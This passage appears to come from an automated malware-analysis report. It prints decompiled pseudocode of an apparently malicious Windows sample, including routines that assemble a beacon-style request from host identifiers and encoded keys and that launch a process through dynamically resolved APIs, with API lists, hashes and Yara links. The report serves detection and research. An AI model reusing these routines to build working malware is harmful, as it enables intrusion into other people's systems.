                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 094b8725308da299601da0c35b0b00d03631d1fc36c093d8a5037541fe65cdf5
                                                          • Instruction ID: 91d52ae814d46c578dadeebe819a4b0e8b0db3a373c6025c0c42f155a9158c9c
                                                          • Opcode Fuzzy Hash: 094b8725308da299601da0c35b0b00d03631d1fc36c093d8a5037541fe65cdf5
                                                          • Instruction Fuzzy Hash: 05718D70B00105AFEB14FBB9D988D5BB7EDEF987407281D25A602D7204FA39FD428B25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04671F13, Relevance: 34.7, APIs: 23, Instructions: 201memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 66%
                                                          			E04671F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x467d018; // 0xf1c1aee9
				asm("bswap eax");
				_t27 =  *0x467d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x467d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x467d00c; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x467d2a8; // 0x47a5a8
				_t3 = _t30 + 0x467e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x467d02c,  *0x467d004, _t25);
				_t33 = E046756CD();
				_t34 =  *0x467d2a8; // 0x47a5a8
				_t4 = _t34 + 0x467e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E046758DB(_t91);
				if(_t96 != 0) {
					_t83 =  *0x467d2a8; // 0x47a5a8
					_t6 = _t83 + 0x467e8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x467d238, 0, _t96);
				}
				_t97 = E0467A199();
				if(_t97 != 0) {
					_t78 =  *0x467d2a8; // 0x47a5a8
					_t8 = _t78 + 0x467e8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x467d238, 0, _t97);
				}
				_t98 =  *0x467d32c; // 0x4af95b0
				_a32 = E04674622( &E0467D00A, _t98 + 4);
				_t42 =  *0x467d2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x467d2a8; // 0x47a5a8
					_t11 = _t74 + 0x467e8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x467d2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x467d2a8; // 0x47a5a8
					_t13 = _t71 + 0x467e88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x467d238, 0, 0x800);
					if(_t100 != 0) {
						E0467518F(GetTickCount());
						_t50 =  *0x467d32c; // 0x4af95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x467d32c; // 0x4af95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x467d32c; // 0x4af95b0
						_t103 = E04671BB6(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x467c28c);
							_push(_t103);
							_t62 = E0467361A();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E04676777(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E04676761();
								}
								HeapFree( *0x467d238, 0, _v44);
							}
							HeapFree( *0x467d238, 0, _t103);
						}
						HeapFree( *0x467d238, 0, _t100);
					}
					HeapFree( *0x467d238, 0, _a24);
				}
				HeapFree( *0x467d238, 0, _t105);
				return _a12;
			}
















































                                                          0x04671f13
                                                          0x04671f13
                                                          0x04671f13
                                                          0x04671f18
                                                          0x04671f1e
                                                          0x04671f28
                                                          0x04671f2a
                                                          0x04671f2a
                                                          0x04671f37
                                                          0x04671f42
                                                          0x04671f45
                                                          0x04671f50
                                                          0x04671f53
                                                          0x04671f58
                                                          0x04671f5b
                                                          0x04671f60
                                                          0x04671f63
                                                          0x04671f6f
                                                          0x04671f7c
                                                          0x04671f7e
                                                          0x04671f84
                                                          0x04671f89
                                                          0x04671f94
                                                          0x04671f96
                                                          0x04671f99
                                                          0x04671fa0
                                                          0x04671fa4
                                                          0x04671fa6
                                                          0x04671fab
                                                          0x04671fb7
                                                          0x04671fb9
                                                          0x04671fc5
                                                          0x04671fc7
                                                          0x04671fc7
                                                          0x04671fd2
                                                          0x04671fd6
                                                          0x04671fd8
                                                          0x04671fdd
                                                          0x04671fe9
                                                          0x04671feb
                                                          0x04671ff7
                                                          0x04671ff9
                                                          0x04671ff9
                                                          0x04671fff
                                                          0x04672012
                                                          0x04672016
                                                          0x0467201d
                                                          0x04672020
                                                          0x04672025
                                                          0x04672030
                                                          0x04672032
                                                          0x04672035
                                                          0x04672035
                                                          0x04672037
                                                          0x0467203e
                                                          0x04672041
                                                          0x04672046
                                                          0x04672050
                                                          0x04672052
                                                          0x0467205a
                                                          0x04672073
                                                          0x04672077
                                                          0x04672083
                                                          0x04672088
                                                          0x04672091
                                                          0x046720a2
                                                          0x046720a6
                                                          0x046720af
                                                          0x046720b5
                                                          0x046720c2
                                                          0x046720cf
                                                          0x046720d5
                                                          0x046720e1
                                                          0x046720e7
                                                          0x046720e8
                                                          0x046720ed
                                                          0x046720f3
                                                          0x046720f9
                                                          0x04672100
                                                          0x04672107
                                                          0x0467210d
                                                          0x04672114
                                                          0x04672118
                                                          0x04672123
                                                          0x04672128
                                                          0x0467212e
                                                          0x04672137
                                                          0x04672137
                                                          0x04672148
                                                          0x04672148
                                                          0x04672157
                                                          0x04672157
                                                          0x04672166
                                                          0x04672166
                                                          0x04672178
                                                          0x04672178
                                                          0x04672187
                                                          0x04672198

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04671F2A
                                                          • wsprintfA.USER32 ref: 04671F77
                                                          • wsprintfA.USER32 ref: 04671F94
                                                          • wsprintfA.USER32 ref: 04671FB7
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04671FC7
                                                          • wsprintfA.USER32 ref: 04671FE9
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04671FF9
                                                          • wsprintfA.USER32 ref: 04672030
                                                          • wsprintfA.USER32 ref: 04672050
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0467206D
                                                          • GetTickCount.KERNEL32 ref: 0467207D
                                                          • RtlEnterCriticalSection.NTDLL(04AF9570), ref: 04672091
                                                          • RtlLeaveCriticalSection.NTDLL(04AF9570), ref: 046720AF
                                                            • Part of subcall function 04671BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,046720C2,?,04AF95B0), ref: 04671BE1
                                                            • Part of subcall function 04671BB6: lstrlen.KERNEL32(?,?,?,046720C2,?,04AF95B0), ref: 04671BE9
                                                            • Part of subcall function 04671BB6: strcpy.NTDLL ref: 04671C00
                                                            • Part of subcall function 04671BB6: lstrcat.KERNEL32(00000000,?), ref: 04671C0B
                                                            • Part of subcall function 04671BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046720C2,?,04AF95B0), ref: 04671C28
                                                          • StrTrimA.SHLWAPI(00000000,0467C28C,?,04AF95B0), ref: 046720E1
                                                            • Part of subcall function 0467361A: lstrlen.KERNEL32(04AF9A78,00000000,00000000,7742C740,046720ED,00000000), ref: 0467362A
                                                            • Part of subcall function 0467361A: lstrlen.KERNEL32(?), ref: 04673632
                                                            • Part of subcall function 0467361A: lstrcpy.KERNEL32(00000000,04AF9A78), ref: 04673646
                                                            • Part of subcall function 0467361A: lstrcat.KERNEL32(00000000,?), ref: 04673651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04672100
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04672107
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04672114
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04672118
                                                            • Part of subcall function 04676777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 04676829
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04672148
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04672157
                                                          • HeapFree.KERNEL32(00000000,00000000,?,04AF95B0), ref: 04672166
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04672178
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04672187
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                          • String ID:
                                                          • API String ID: 3080378247-0
                                                          • Opcode ID: d5cf5f43145b087f17472e4efb7b0d04b849a83d04e472da2f209c16c63c0e27
                                                          • Instruction ID: 01deeaa061adb8ded655184867b633cd3020c2f99fc04be7517eefcc695dd513
                                                          • Opcode Fuzzy Hash: d5cf5f43145b087f17472e4efb7b0d04b849a83d04e472da2f209c16c63c0e27
                                                          • Instruction Fuzzy Hash: EB616E71500204AFE715DB68EC48E5A77E9EF49394F041914FA09D7260FB3EEC06DBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04676C38, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 27%
                                                          			E04676C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x467d33c; // 0x4af9798
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E0467A557(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x467c18c;
				}
				_t46 = E046718A5(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E0467A71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x467d2a8; // 0x47a5a8
						_t16 = _t75 + 0x467eb08; // 0x530025
						 *0x467d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E0467A557(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x467c190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E0467A71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E0467A734(_v20);
						} else {
							_t66 =  *0x467d2a8; // 0x47a5a8
							_t31 = _t66 + 0x467ec28; // 0x73006d
							 *0x467d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E0467A734(_v12);
				}
				return _v24;
			}




























                                                          0x04676c40
                                                          0x04676c46
                                                          0x04676c4d
                                                          0x04676c53
                                                          0x04676c57
                                                          0x04676c5b
                                                          0x04676c5e
                                                          0x04676c63
                                                          0x04676c68
                                                          0x04676c6a
                                                          0x04676c6a
                                                          0x04676c73
                                                          0x04676c78
                                                          0x04676c7d
                                                          0x04676c83
                                                          0x04676c8d
                                                          0x04676c96
                                                          0x04676c9d
                                                          0x04676cb6
                                                          0x04676cbb
                                                          0x04676cc0
                                                          0x04676cc9
                                                          0x04676cd2
                                                          0x04676ce3
                                                          0x04676cec
                                                          0x04676cf0
                                                          0x04676cf4
                                                          0x04676cf9
                                                          0x04676cfe
                                                          0x04676d00
                                                          0x04676d00
                                                          0x04676d0a
                                                          0x04676d13
                                                          0x04676d1a
                                                          0x04676d32
                                                          0x04676d36
                                                          0x04676d73
                                                          0x04676d38
                                                          0x04676d3b
                                                          0x04676d43
                                                          0x04676d54
                                                          0x04676d60
                                                          0x04676d68
                                                          0x04676d6c
                                                          0x04676d6c
                                                          0x04676d36
                                                          0x04676d7b
                                                          0x04676d80
                                                          0x04676d87

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04676C4D
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 04676C8D
                                                          • lstrlen.KERNEL32(00000000), ref: 04676C96
                                                          • lstrlen.KERNEL32(00000000), ref: 04676C9D
                                                          • lstrlenW.KERNEL32(80000002), ref: 04676CAA
                                                          • lstrlen.KERNEL32(?,00000004), ref: 04676D0A
                                                          • lstrlen.KERNEL32(?), ref: 04676D13
                                                          • lstrlen.KERNEL32(?), ref: 04676D1A
                                                          • lstrlenW.KERNEL32(?), ref: 04676D21
                                                            • Part of subcall function 0467A734: HeapFree.KERNEL32(00000000,00000000,04675637,00000000,?,?,00000000), ref: 0467A740
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 2535036572-0
                                                          • Opcode ID: 692e45da386faaa584ecf612ab7538964fc40f8c6074a46196d5ac21718d4f76
                                                          • Instruction ID: 8bec317f9a4270fe39f5be24bf9e788c3baeb555e756b4ec23bd058c63f91f0d
                                                          • Opcode Fuzzy Hash: 692e45da386faaa584ecf612ab7538964fc40f8c6074a46196d5ac21718d4f76
                                                          • Instruction Fuzzy Hash: A1414C76D00219FBDF12AFA4CC08D9E7BB5EF44358F054055EA04A7210EB36EE55DB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04678EA1, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E04678EA1(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E0467592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E0467A749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x467d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x467d2a8; // 0x47a5a8
					_t18 = _t47 + 0x467e3e6; // 0x73797325
					_t68 = E04673C48(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x467d2a8; // 0x47a5a8
						_t19 = _t50 + 0x467e747; // 0x4af8cef
						_t20 = _t50 + 0x467e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E0467A62D();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E0467A62D();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x467d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E0467A734(_t70);
				goto L12;
			}


















                                                          0x04678ea9
                                                          0x04678ea9
                                                          0x04678eb8
                                                          0x04678ebf
                                                          0x04678ec4
                                                          0x04678fd1
                                                          0x04678fd8
                                                          0x04678fd8
                                                          0x04678ed3
                                                          0x04678edb
                                                          0x04678ede
                                                          0x04678ee3
                                                          0x04678ef8
                                                          0x04678efe
                                                          0x04678eff
                                                          0x04678f02
                                                          0x04678f08
                                                          0x04678f0b
                                                          0x04678f10
                                                          0x04678f18
                                                          0x04678f24
                                                          0x04678f28
                                                          0x04678fb8
                                                          0x04678f2e
                                                          0x04678f2e
                                                          0x04678f33
                                                          0x04678f3a
                                                          0x04678f4e
                                                          0x04678f52
                                                          0x04678fa1
                                                          0x04678f54
                                                          0x04678f55
                                                          0x04678f5c
                                                          0x04678f75
                                                          0x04678f77
                                                          0x04678f7b
                                                          0x04678f82
                                                          0x04678f9c
                                                          0x04678f84
                                                          0x04678f8d
                                                          0x04678f92
                                                          0x04678f92
                                                          0x04678f82
                                                          0x04678fb0
                                                          0x04678fb0
                                                          0x04678f28
                                                          0x04678fbf
                                                          0x04678fc8
                                                          0x04678fcc
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 0467592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04678EBD,?,00000001,?,?,00000000,00000000), ref: 04675952
                                                            • Part of subcall function 0467592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04675974
                                                            • Part of subcall function 0467592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0467598A
                                                            • Part of subcall function 0467592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 046759A0
                                                            • Part of subcall function 0467592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 046759B6
                                                            • Part of subcall function 0467592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 046759CC
                                                          • memset.NTDLL ref: 04678F0B
                                                            • Part of subcall function 04673C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04678F24,73797325), ref: 04673C59
                                                            • Part of subcall function 04673C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04673C73
                                                          • GetModuleHandleA.KERNEL32(4E52454B,04AF8CEF,73797325), ref: 04678F41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 04678F48
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04678FB0
                                                            • Part of subcall function 0467A62D: GetProcAddress.KERNEL32(36776F57,0467A2D4), ref: 0467A648
                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04678F8D
                                                          • CloseHandle.KERNEL32(?), ref: 04678F92
                                                          • GetLastError.KERNEL32(00000001), ref: 04678F96
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 3075724336-0
                                                          • Opcode ID: 4fd13d72644aa28e3bd1daba2a4a577e38dcff6cdc4bd5a232415f198fc4e22c
                                                          • Instruction ID: 5eb2cb417093c94b1ad53fe867708f6fa15291427f2c49ce1901efd0f2841ada
                                                          • Opcode Fuzzy Hash: 4fd13d72644aa28e3bd1daba2a4a577e38dcff6cdc4bd5a232415f198fc4e22c
                                                          • Instruction Fuzzy Hash: 28311DB6900208BFDB11AFA4DC88D9EBBBDEF48354F104469E606A7250F739AD45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04671BB6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 63%
                                                          			E04671BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x467d2a8; // 0x47a5a8
				_t1 = _t9 + 0x467e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E0467173D(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E0467A71F(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E046764EF(_t34, _t41, _a8);
						E0467A734(_t41);
						_t42 = E04676467(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E0467A734(_t36);
							_t36 = _t42;
						}
						_t43 = E046717E5(_t36, _t33);
						if(_t43 != 0) {
							E0467A734(_t36);
							_t36 = _t43;
						}
					}
					E0467A734(_t28);
				}
				return _t36;
			}














                                                          0x04671bb6
                                                          0x04671bb9
                                                          0x04671bba
                                                          0x04671bc2
                                                          0x04671bc9
                                                          0x04671bd0
                                                          0x04671bd4
                                                          0x04671bda
                                                          0x04671be1
                                                          0x04671be6
                                                          0x04671bf8
                                                          0x04671bfc
                                                          0x04671c00
                                                          0x04671c06
                                                          0x04671c0b
                                                          0x04671c1b
                                                          0x04671c1d
                                                          0x04671c34
                                                          0x04671c38
                                                          0x04671c3b
                                                          0x04671c40
                                                          0x04671c40
                                                          0x04671c49
                                                          0x04671c4d
                                                          0x04671c50
                                                          0x04671c55
                                                          0x04671c55
                                                          0x04671c4d
                                                          0x04671c58
                                                          0x04671c58
                                                          0x04671c63

                                                          APIs
                                                            • Part of subcall function 0467173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,04671BD0,253D7325,00000000,00000000,7742C740,?,?,046720C2,?), ref: 046717A4
                                                            • Part of subcall function 0467173D: sprintf.NTDLL ref: 046717C5
                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,046720C2,?,04AF95B0), ref: 04671BE1
                                                          • lstrlen.KERNEL32(?,?,?,046720C2,?,04AF95B0), ref: 04671BE9
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • strcpy.NTDLL ref: 04671C00
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04671C0B
                                                            • Part of subcall function 046764EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04671C1A,00000000,?,?,?,046720C2,?,04AF95B0), ref: 04676506
                                                            • Part of subcall function 0467A734: HeapFree.KERNEL32(00000000,00000000,04675637,00000000,?,?,00000000), ref: 0467A740
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046720C2,?,04AF95B0), ref: 04671C28
                                                            • Part of subcall function 04676467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04671C34,00000000,?,?,046720C2,?,04AF95B0), ref: 04676471
                                                            • Part of subcall function 04676467: _snprintf.NTDLL ref: 046764CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 1a90b53962f3a75ba5b549a1a311e69ed0c751330e82c98256bc089489afd419
                                                          • Instruction ID: 7974963985322599a8fb391f88ed516f5076c16689373cd9e8f343dc7771a13e
                                                          • Opcode Fuzzy Hash: 1a90b53962f3a75ba5b549a1a311e69ed0c751330e82c98256bc089489afd419
                                                          • Instruction Fuzzy Hash: D411C27B501625779716BBF49C84CAE3BAD9F86669315411AFA049B300FE38ED0287A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04676891, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 046768EB
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 046768FF
                                                          • SysAllocString.OLEAUT32(00000000), ref: 04676911
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04676979
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04676988
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04676993
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 1fdc8dd878495c545c0f3d3562f25d286f476d14ce51e20e673465777a2ac2e2
                                                          • Instruction ID: 6b4bb556ba489113447893910ddd73a3063c1e7f9ae41da0cb0ac8f2beb7e6a5
                                                          • Opcode Fuzzy Hash: 1fdc8dd878495c545c0f3d3562f25d286f476d14ce51e20e673465777a2ac2e2
                                                          • Instruction Fuzzy Hash: D4415336D00A09AFDB01DFBCD84469FB7B9EF89310F144465E914EB260EA71ED05CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0467592D, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0467592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
